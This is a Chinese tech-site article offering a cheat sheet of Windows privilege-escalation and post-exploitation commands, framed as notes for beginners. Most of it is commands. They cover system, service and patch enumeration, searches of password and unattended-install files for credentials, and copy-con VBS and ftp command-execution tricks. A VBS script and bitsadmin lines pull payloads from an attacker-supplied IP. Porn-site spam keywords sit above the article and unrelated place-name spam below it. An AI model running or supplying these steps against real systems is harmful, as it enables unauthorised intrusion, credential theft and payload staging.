91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Windows內網滲透提權的實用命令有哪些

發布時間:2021-10-22 16:49:04 來源:億速云 閱讀:282 作者:柒染 欄目:系統運維

Windows內網滲透提權的實用命令有哪些,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

Windows內網滲透提權的實用命令有哪些

這不是一篇滲透測試指導,而是簡單介紹了幾個Windows內網提權的實用命令,以供我等菜鳥學習觀摩,還望大牛包涵指導。

1.獲取操作系統信息

識別操作系統名稱及版本:

C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  OS Name: Microsoft Windows 10 Pro OS Version: 10.0.14393 N/A Build 14393

當然中文系統你得這樣:

systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"

識別系統體系結構:

C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE%  AMD64

查看所有環境變量:

C:\Users\thel3l> SET USERNAME=thel3l USERPROFILE=C:\Users\thel3l *snip*

查看某特定用戶信息:

C:\Users\thel3l>net user thel3l  User name thel3l *snip* The command completed successfully

2.獲取網絡信息

查看路由表信息:

C:\Users\thel3l> route print

查看ARP緩存信息:

C:\Users\thel3l> arp -A

查看防火墻規則:

C:\Users\thel3l> netstat -ano  C:\Users\thel3l> netsh firewall show config  C:\Users\thel3l> netsh firewall show state

3.應用程序及服務信息

查看計劃任務:

C:\Users\thel3l> schtasks /QUERY /fo LIST /v

中文系統的命令,先調整GBK編碼為437美國編碼:

chcp 437

然后

schtasks /QUERY /fo LIST /v

查看服務進程ID:

C:\Users\thel3l> tasklist /SVC

查看安裝驅動:

C:\Users\thel3l> DRIVERQUERY

查看安裝程序和版本信息(漏洞利用線索):

C:\Users\thel3l> wmic product list brief

查看服務、進程和啟動程序信息:

C:\Users\thel3l> wmic service list brief C:\Users\thel3l> wmic process list brief C:\Users\thel3l> wmic startup list brief

查看.msi程序的執行權限:

C:\Users\thel3l> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated C:\Users\thel3l> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

查看是否設置有setuid和setgid:

C:\Users\thel3l>reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

查看安裝補丁和時間信息:

C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn

查看特定漏洞補丁信息:

C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

4.敏感數據和目錄

查找密碼文件或其它敏感文件:

C:\Users\thel3l> cd/ C:\Users\thel3l> dir /b/s password.txt  C:\Users\thel3l> dir /b/s config.*  C:\Users\thel3l> findstr /si password *.xml *.ini *.txt C:\Users\thel3l> findstr /si login *.xml *.ini *.txt

無人值守安裝文件:

這些文件通常包含base64模式的密碼信息。這類文件在一些大型企業網絡或GHO系統中可以發現,文件通常的位置如下:

C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend\Unattended.xml  C:\Windows\Panther\Unattended.xml

5.文件系統

可以通過調用系統預安裝程序語言查看當前可訪問目錄或文件權限,如python下:

import os; os.system("cmd /c {command here}")

使用copy con命令創建ftp執行會話:

范例

C:\Users\thel3l> copy con ftp.bat #創建一個名為ftp.bat的批處理文件  ftp # 輸入執行會話名稱,按回車到下一行,之后按CTRL+Z結束編輯,再按回車退出  C:\Users\thel3l> ftp.bat # 執行創建的文件  ftp> # 執行ftp命令  ftp> !{command} # e.g. - !dir or !ipconfig

使用copy con命令創建VBS腳本文件:

C:\Users\thel3l> copy con commandExec.vbs #創建VBS腳本文件  Call WScript.CreateObject("Wscript.Shell").Run("cmd /K {command}", 8, True) #VBS文件內容  C:\Users\thel3l> commandExec.vbs #執行腳本文件

檢查文件夾可寫狀態:

C:\Users\thel3l> dir /a-r-d /s /b

6.一個有用的文件上傳腳本

' downloadfile.vbs   ' Set your settings  strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"  strHDLocation = "c:\\{FILE_NAME.EXT}"  ' Fetch the file  Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")  objXMLHTTP.open "GET", strFileURL, false  objXMLHTTP.send()  If objXMLHTTP.Status = 200 Then  Set objADOStream = CreateObject("ADODB.Stream")  objADOStream.Open  objADOStream.Type = 1 'adTypeBinary  objADOStream.Write objXMLHTTP.ResponseBody  objADOStream.Position = 0 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject")  If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation  Set objFSO = Nothing  objADOStream.SaveToFile strHDLocation  objADOStream.Close  Set objADOStream = Nothing  End if  Set objXMLHTTP = Nothing

該腳本是一個社區發布的,你可以以下這種方式運行它:

C:\Users\thel3l>cscript.exe downloadfile.vbs

bitsadmin命令:

如果你的目標系統是Windows 7及以上操作系統,你可以使用bitsadmin命令,bitsadmin是一個命令行工具,可用于創建下載上傳進程:

范例

C:\Users\thel3l> bitsadmin /transfer job_name /download /priority priority URL local\path\file   C:\Users\thel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT}   C:\Users\username\Downloads\{FILE_NAME.EXT}

如:

bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip

關于Windows內網滲透提權的實用命令有哪些問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

叙永县| 沈丘县| 建平县| 高雄市| 玛曲县| 金塔县| 永仁县| 大姚县| 简阳市| 井研县| 潜江市| 长沙县| 通化县| 石河子市| 芒康县| 潼南县| 海盐县| 迁西县| 石嘴山市| 揭阳市| 多伦县| 上林县| 乌兰察布市| 镇江市| 谢通门县| 原平市| 海兴县| 福清市| 梁山县| 会同县| 桐庐县| 乐安县| 当涂县| 大丰市| 板桥市| 龙州县| 商水县| 巴彦淖尔市| 宝坻区| 垫江县| 广灵县|